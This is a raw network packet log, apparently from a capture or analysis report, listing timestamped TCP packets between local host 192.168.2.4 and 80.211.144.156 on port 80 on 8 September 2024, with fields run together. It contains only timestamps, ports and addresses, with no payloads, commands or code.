                                                          Sep 8, 2024 11:53:10.056507111 CEST806476680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:10.103261948 CEST6476680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:10.263293982 CEST806476680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:10.306401014 CEST6476680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:10.381931067 CEST6476680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:10.382666111 CEST6476780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:10.387271881 CEST806476680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:10.387440920 CEST6476680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:10.387495995 CEST806476780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:10.387650013 CEST6476780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:10.387953997 CEST6476780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:10.392786980 CEST806476780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:10.744009018 CEST6476780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:10.748960018 CEST806476780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:10.748975992 CEST806476780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:10.748986959 CEST806476780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:11.054888010 CEST806476780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:11.103274107 CEST6476780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:11.188795090 CEST806476780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:11.243894100 CEST6476780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:11.302242041 CEST6476780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:11.302845955 CEST6476880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:11.309458971 CEST806476780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:11.309575081 CEST6476780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:11.309741020 CEST806476880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:11.309854031 CEST6476880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:11.310095072 CEST6476880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:11.315066099 CEST806476880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:11.665826082 CEST6476880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:11.670855999 CEST806476880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:11.670875072 CEST806476880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:11.670886993 CEST806476880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:11.977108002 CEST806476880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.025111914 CEST6476880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.180708885 CEST806476880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.228281975 CEST6476880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.245199919 CEST6476880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.245513916 CEST6476980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.250432968 CEST806476880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.250454903 CEST806476980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.250525951 CEST6476880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.250581026 CEST6476980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.252726078 CEST6476980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.257519960 CEST806476980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.303811073 CEST6476980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.304495096 CEST6477080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.309304953 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.309413910 CEST6477080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.310857058 CEST6477080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.315709114 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.350007057 CEST806476980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.665843964 CEST6477080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:12.670948029 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.670963049 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.670970917 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.732285023 CEST806476980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:12.732333899 CEST6476980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.177074909 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:13.193813086 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:13.193901062 CEST6477080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.197818995 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:13.197870970 CEST6477080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.324515104 CEST6477080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.325328112 CEST6477180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.329843998 CEST806477080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:13.329893112 CEST6477080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.330117941 CEST806477180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:13.330176115 CEST6477180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.330307961 CEST6477180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.335016012 CEST806477180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:13.681571960 CEST6477180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:13.686461926 CEST806477180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:13.686474085 CEST806477180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:13.686484098 CEST806477180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:14.003334045 CEST806477180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:14.056428909 CEST6477180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:14.208472967 CEST806477180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:14.259531021 CEST6477180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:14.334583998 CEST6477180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:14.335328102 CEST6477280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:14.339739084 CEST806477180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:14.339999914 CEST6477180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:14.340136051 CEST806477280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:14.340219021 CEST6477280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:14.340343952 CEST6477280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:14.345156908 CEST806477280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:14.697081089 CEST6477280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:14.702145100 CEST806477280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:14.702161074 CEST806477280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:14.702167988 CEST806477280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:15.004048109 CEST806477280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:15.056324959 CEST6477280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:15.212975979 CEST806477280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:15.259476900 CEST6477280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:15.335205078 CEST6477280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:15.335671902 CEST6477380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:15.340672016 CEST806477380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:15.340711117 CEST806477280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:15.340802908 CEST6477380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:15.340821981 CEST6477280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:15.340979099 CEST6477380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:15.345864058 CEST806477380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:15.697124958 CEST6477380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:15.702169895 CEST806477380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:15.702184916 CEST806477380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:15.702198029 CEST806477380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.008153915 CEST806477380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.056368113 CEST6477380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:16.136841059 CEST806477380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.181364059 CEST6477380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:16.255780935 CEST6477380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:16.256474018 CEST6477480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:16.260870934 CEST806477380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.260950089 CEST6477380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:16.261260986 CEST806477480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.261326075 CEST6477480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:16.261452913 CEST6477480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:16.266809940 CEST806477480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.618973970 CEST6477480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:16.623960018 CEST806477480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.623976946 CEST806477480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.623989105 CEST806477480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:16.955614090 CEST806477480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.009506941 CEST6477480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.088589907 CEST806477480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.134444952 CEST6477480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.209522009 CEST6477480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.210237980 CEST6477580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.215116978 CEST806477580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.215173960 CEST6477580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.215267897 CEST6477580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.215303898 CEST806477480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.215346098 CEST6477480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.220056057 CEST806477580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.307635069 CEST6477680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.307714939 CEST6477580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.312572002 CEST806477680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.312659979 CEST6477680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.312753916 CEST6477680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.317606926 CEST806477680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.353898048 CEST806477580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.429287910 CEST6477780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.434168100 CEST806477780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.434262037 CEST6477780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.434405088 CEST6477780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.443068981 CEST806477780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.665837049 CEST6477680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.670742989 CEST806477680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.670916080 CEST806477680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.688431025 CEST806477580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.688510895 CEST6477580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.790874958 CEST6477780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:17.795912981 CEST806477780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.795923948 CEST806477780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.795932055 CEST806477780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:17.976325989 CEST806477680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.025079012 CEST6477680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.104505062 CEST806477680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.115796089 CEST806477780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.150131941 CEST6477680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.165749073 CEST6477780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.393701077 CEST806477780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.446955919 CEST6477780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.521934986 CEST6477780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.522011042 CEST6477680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.522759914 CEST6477880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.527111053 CEST806477780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.527266979 CEST6477780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.527368069 CEST806477680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.527421951 CEST6477680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.527508020 CEST806477880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.527575016 CEST6477880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.527678013 CEST6477880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.532409906 CEST806477880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.884573936 CEST6477880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:18.889616966 CEST806477880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.889633894 CEST806477880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:18.889642954 CEST806477880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:19.219105005 CEST806477880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:19.259589911 CEST6477880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:19.425755978 CEST806477880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:19.478231907 CEST6477880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:19.553214073 CEST6477980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:19.558208942 CEST806477980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:19.558315039 CEST6477980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:19.558459997 CEST6477980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:19.563266039 CEST806477980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:19.915808916 CEST6477980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:19.920775890 CEST806477980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:19.920789003 CEST806477980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:19.920798063 CEST806477980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:20.227173090 CEST806477980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:20.275100946 CEST6477980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.435189009 CEST806477980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:20.478290081 CEST6477980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.550920963 CEST6477880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.555850983 CEST6477980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.557145119 CEST6478080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.561029911 CEST806477980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:20.561125994 CEST6477980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.562016964 CEST806478080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:20.562113047 CEST6478080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.562295914 CEST6478080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.567051888 CEST806478080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:20.915920973 CEST6478080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:20.920902014 CEST806478080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:20.920914888 CEST806478080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:20.920924902 CEST806478080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:21.254877090 CEST806478080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:21.306564093 CEST6478080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:21.390332937 CEST806478080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:21.431354046 CEST6478080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:21.508008003 CEST6478080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:21.509004116 CEST6478180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:21.513447046 CEST806478080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:21.513504028 CEST6478080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:21.514089108 CEST806478180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:21.514154911 CEST6478180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:21.514278889 CEST6478180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:21.518990040 CEST806478180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:21.869141102 CEST6478180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:21.874149084 CEST806478180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:21.874165058 CEST806478180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:21.874175072 CEST806478180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:22.181226969 CEST806478180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:22.228261948 CEST6478180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:22.308634996 CEST806478180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:22.356512070 CEST6478180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:22.428078890 CEST6478180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:22.428698063 CEST6478280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:22.433526039 CEST806478180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:22.433542013 CEST806478280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:22.433607101 CEST6478180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:22.433640957 CEST6478280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:22.433754921 CEST6478280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:22.438635111 CEST806478280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:22.790874004 CEST6478280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:22.795861006 CEST806478280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:22.795874119 CEST806478280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:22.795883894 CEST806478280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:23.105921030 CEST806478280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:23.119621038 CEST6478280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:23.120110989 CEST6478380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:23.124798059 CEST806478280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:23.124866962 CEST6478280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:23.124880075 CEST806478380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:23.124949932 CEST6478380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:23.125055075 CEST6478380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:23.129781008 CEST806478380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:23.255112886 CEST6478480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:23.260056019 CEST806478480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:23.260138035 CEST6478480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:23.260252953 CEST6478480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:23.265000105 CEST806478480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:23.478318930 CEST6478380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:23.483153105 CEST806478380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:23.483263016 CEST806478380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:23.618938923 CEST6478480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:23.623980999 CEST806478480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:23.623995066 CEST806478480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:23.624003887 CEST806478480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:23.799460888 CEST806478380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:23.853214979 CEST6478380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:23.928229094 CEST806478480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:23.978224993 CEST6478480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:24.004053116 CEST806478380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:24.056360960 CEST6478380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:24.131973982 CEST806478480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:24.181427956 CEST6478480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:24.257564068 CEST6478380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:24.258431911 CEST6478580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:24.258439064 CEST6478480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:24.262734890 CEST806478380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:24.262953997 CEST6478380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:24.263242006 CEST806478580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:24.263307095 CEST6478580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:24.263334036 CEST806478480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:24.263375998 CEST6478480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:24.263524055 CEST6478580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:24.268276930 CEST806478580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:24.619117022 CEST6478580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:24.624145985 CEST806478580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:24.624164104 CEST806478580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:24.624174118 CEST806478580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:24.944761038 CEST806478580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:24.993956089 CEST6478580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:25.076587915 CEST806478580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:25.118848085 CEST6478580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:25.193017006 CEST6478680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:25.197869062 CEST806478680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:25.202404976 CEST6478680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:25.202526093 CEST6478680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:25.207355022 CEST806478680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:25.556559086 CEST6478680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:25.561557055 CEST806478680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:25.561574936 CEST806478680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:25.561583042 CEST806478680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:25.866633892 CEST806478680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:25.915724993 CEST6478680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:25.996840954 CEST806478680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:26.040719986 CEST6478680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:26.115397930 CEST6478680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:26.116061926 CEST6478780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:26.120789051 CEST806478680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:26.120892048 CEST806478780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:26.120946884 CEST6478680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:26.120975971 CEST6478780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:26.121084929 CEST6478780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:26.125912905 CEST806478780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:26.478346109 CEST6478780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:26.483278036 CEST806478780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:26.483300924 CEST806478780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:26.483311892 CEST806478780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:26.782145977 CEST806478780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:26.837747097 CEST6478780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:26.916110039 CEST806478780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:26.962579012 CEST6478780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:27.054061890 CEST6478580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:27.056103945 CEST6478780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:27.057130098 CEST6478880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:27.061264992 CEST806478780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:27.061315060 CEST6478780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:27.061959028 CEST806478880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:27.062027931 CEST6478880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:27.062130928 CEST6478880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:27.066895962 CEST806478880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:27.415872097 CEST6478880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:27.420909882 CEST806478880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:27.420923948 CEST806478880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:27.420937061 CEST806478880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:27.753386974 CEST806478880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:27.806370020 CEST6478880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:27.884740114 CEST806478880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:27.931396008 CEST6478880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:28.006702900 CEST6478880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:28.007450104 CEST6478980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:28.011879921 CEST806478880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:28.011929989 CEST6478880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:28.012245893 CEST806478980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:28.012331963 CEST6478980192.168.2.480.211.144.156
